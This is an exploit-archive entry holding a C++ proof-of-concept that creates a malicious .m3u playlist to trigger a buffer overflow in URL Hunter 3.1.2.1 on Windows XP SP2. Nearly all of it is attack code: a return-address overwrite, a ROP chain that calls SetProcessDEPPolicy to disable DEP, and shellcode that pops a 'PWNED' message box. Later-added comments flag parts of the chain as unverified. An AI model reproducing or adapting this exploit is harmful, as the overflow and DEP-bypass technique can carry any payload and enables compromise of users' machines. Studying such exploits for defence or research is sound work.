
# Title : URL Hunter Buffer Overflow DEP Bypass
# Published : 2012-06-21
# Author :
# Previous Title : Windows Escalate Task Scheduler XML Privilege Escalation
# Next Title : wicd Local Privilege Esclation Exploit


/*######################################################################
 Exploit Title: URL Hunter buffer overflow DEP Bypass
 Author: Ayrbyte
 Vendor or Software Link: Mini-stream Software
 Link : http://mini-stream.net/url-hunter/
 Version: 3.1.2.1
 Category: local
 Tested on: Windows XP sp 2
 Code : c++
 Fb : /Ayrbyte
########################################################################
Greetz To : 
    XerkusR, Kira, 3|_^^1x, WPFr, C-byte, H4mz_JR, Ch0lise7en, R31tuz
    Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,
    Zet Dot Exe, Gabby X-Friends, Valcon Trignome 
    and all CREMY & b-compi family
######################################################################*/
//NOTE: this program writes the crafted playlist to C:\Ayrbyte.m3u; that is the file to open in URL Hunter to trigger the overflow.
#include <cstdio>
#include <iostream>
using namespace std;
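// Writes the crafted .m3u file described in the header (URL Hunter 3.1.2.1,
// tested on Windows XP SP2). The original listing lost every backslash, so
// "x41" etc. were plain ASCII rather than the bytes the comments describe;
// the escapes are restored here to match the annotated opcodes/addresses.
//
// Every byte string below is deliberately NUL-free: fputs() stops at the
// first '\0', so a zero byte anywhere in the chain would truncate the file.
// All gadget/function addresses are absolute and taken from the XP SP2
// builds of shell32/ntdll/gdi32/user32 — they must be re-found with a gadget
// finder for any other OS/DLL version.
int main(){
const char header[] = "http://";
const char buff[]   = "\x41";                 // filler byte 'A'
// Overwritten return address: a plain "retn" that pivots into the ROP chain.
const char eip[]    = "\x16\x10\x9c\x7c";     //#retn |SHELL32.dll
const char nop[]    = "\x90";
//call MessageBoxA "PWNED by Ayrbyte...! ^_^"
// EAX/EDX are built by MOV + SUB so the resulting values (string pointer,
// 0) are produced without embedding zero bytes in the shellcode.
// E8 is a *relative* call: its displacement assumes the shellcode lands at
// the same stack address as on the author's test system — TODO confirm.
const char code[] =
"\xB8\x36\xC6\x0D\x10" //#MOV EAX,100DC636
"\xB9\xFF\xFF\xFF\x0F" //#MOV ECX,0FFFFFFF
"\xBA\xFF\xFF\xFF\x0F" //#MOV EDX,0FFFFFFF
"\x2B\xC1\x2B\xD1\x52" //#SUB EAX,ECX #SUB EDX,ECX #PUSH EDX
"\x50\x90\x90\x90\x90" //#PUSH EAX #NOP #NOP #NOP #NOP
"\x90\x50\x90\x90\x90" //#NOP #PUSH EAX #NOP #NOP #NOP
"\x90\x52\x90"         //#NOP #PUSH EDX #NOP
"\xE8\xD5\x3E\xCA\x77" //<---CALL USER32.MessageBoxA
//string "PWNED By Ayrbyte...! ^_^"
"\x20\x50\x57\x4E\x45\x44\x20\x42\x79\x20\x41\x79"
"\x72\x62\x79\x74\x65\x2E\x2E\x2E\x21\x20\x5E\x5F\x5E";
// ROP chain preparing a SetProcessDEPPolicy(0) call: EBX becomes 0 via
// pop 0xFFFFFFFF + inc, EBP gets the SetProcessDEPPolicy address, EDI/ESI
// get "retn" gadgets, EAX/ECX/EDX are zeroed. NOTE(review): the comments do
// not show how the call itself is triggered — the final gadget is labelled
// "jmp esp"; verify the chain in a debugger before relying on it.
const char rop[] =
"\x41\x41\x41\x41" //padding so the chain lines up with ESP
"\x42\x02\x9F\x7C" //#pop ebx #retn |shell32.dll
"\xFF\xFF\xFF\xFF" //<--value popped into ebx (inc below makes it 0)
"\xD8\x85\xA4\x7C" //#inc ebx #retn |shell32.dll
"\xAF\xCF\xA4\x7C" //#pop ebp #retn |shell32.dll
"\xA4\x22\x86\x7C" //#<- SetProcessDEPPolicy, into EBP
"\xCA\x2E\xAE\x7c" //#pop edi #retn |shell32.dll
"\xCB\x2E\xAE\x7C" //#retn |shell32.dll
"\xFE\x2E\xAE\x7C" //#pop esi #retn |shell32.dll
"\xCB\x2E\xAE\x7C" //#retn |shell32.dll
"\x01\x4E\x9E\x7C" //#xor eax,eax #retn |shell32.dll
"\x1D\xC9\x91\x7C" //#xor ecx,ecx #retn |ntdll.dll
"\x8E\x09\xF3\x77" //#xor edx,edx #retn |gdi32.dll
"\x65\x82\xA5\x7C";//#jmp esp |shell32.dll
//Make Exploit File
// "wb": binary mode so the CRT never rewrites bytes (e.g. 0x0A -> CRLF).
FILE *teksfile = fopen("c:\\Ayrbyte.m3u", "wb");
if (teksfile == nullptr) {
    perror("fopen c:\\Ayrbyte.m3u");
    return 1;
}
fputs(header, teksfile);
for(int i=0; i < 17417; i++){fputs(buff, teksfile);}   // offset to saved EIP
fputs(eip, teksfile);
fputs(rop, teksfile);
for(int i=0; i < 28; i++){fputs(nop, teksfile);}       // NOP sled into code
fputs(code, teksfile);
fclose(teksfile);
return 0;}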
/*###############################################################
#we are CREMY          ##########       ###### ###### ##   ##
#we are unity          ##        ###### ##  ## ##  ##  ##  ##
#we love peace         ## ###### ##     ##  ## ##  ##   ## ##
#we crazy but not lazy ## ##  ## ########### ####  ##    ####
#what about you...?    ## ###### ##     ##         ##     ###
#be crazy now...!      ## ## ##  ###### ##         ##      ##
##################################     ##         ##      ##
                          ##  ##    #######################   */